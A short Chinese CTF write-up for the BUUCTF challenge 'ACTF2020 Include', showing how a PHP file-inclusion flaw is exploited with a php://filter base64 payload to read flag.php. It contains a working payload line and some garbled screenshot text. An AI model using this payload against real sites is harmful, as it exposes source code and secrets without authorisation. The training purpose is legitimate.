[ACTF2020新生赛]Include

合集 - buuctf--web(7)
1.[极客大挑战2019]EasySQL2.[极客大挑战 2019]Havefun
3.[ACTF2020新生赛]Include
4.[ACTF2020 新生赛]Exec 15.[GXYCTF2019]Ping Ping Ping 16.[强网杯 2019]随便注7.[极客大挑战 2019]Secret File
收起

>

[ACTF2020 新生赛****]Include

c O a c7ffc310-47d1-4673-9e3c-e53af99bb7ce.node4. buuoj.cn:81 Linux win Ows Can you find out the flag? Q HTML head < / html > D centos DR D Git HackBar

由于是file伪协议打开flag.php文件可能存在文件漏洞

进入发现没有flag

进行猜测flag存在flag.php源代码中

可以利用php://filter伪协议来查看flag.php的源代码,

构造payload:?file=php://filter/convert.base64-encode/resource=flag.php

看到文件

PD9waHAKZWNobyAiQ2FulHlvdSBmaW5klG91dCBOaGUgZmxhZz8iOwovL2ZsYWd7Yzc4M2RkODgtY2E5YSOOYjAwLTkxYWUtZTdmYWMxNTlmMjcOfQo= HackBar q HTML P09waHAKNNobyAiQ2F ulH1vdsgmawSk1Gg1dcgeaGUgZmxhZz8i0wov L2Zsywd7Yzc4m2RkOOgtY2ESvseeyjAuL dmnelxN1 Imm5cafQo- :hov

把字符串拿去base64解码

得到flag

posted @   回忆的金鱼  阅读(19)  评论(0编辑  收藏  举报
相关博文:
·  [ACTF2020 新生赛]Exec 1
·  [极客大挑战 2019]Secret File
·  [ACTF2020 新生赛]Include
·  BUUOJ[ACTF2020 新生赛]Include 1
·  [ACTF2020 新生赛]Include
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· .NET Core 中如何实现缓存的预热?
· 三行代码完成国际化适配,妙~啊~
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
点击右上角即可分享
微信分享提示
SQL AI 助手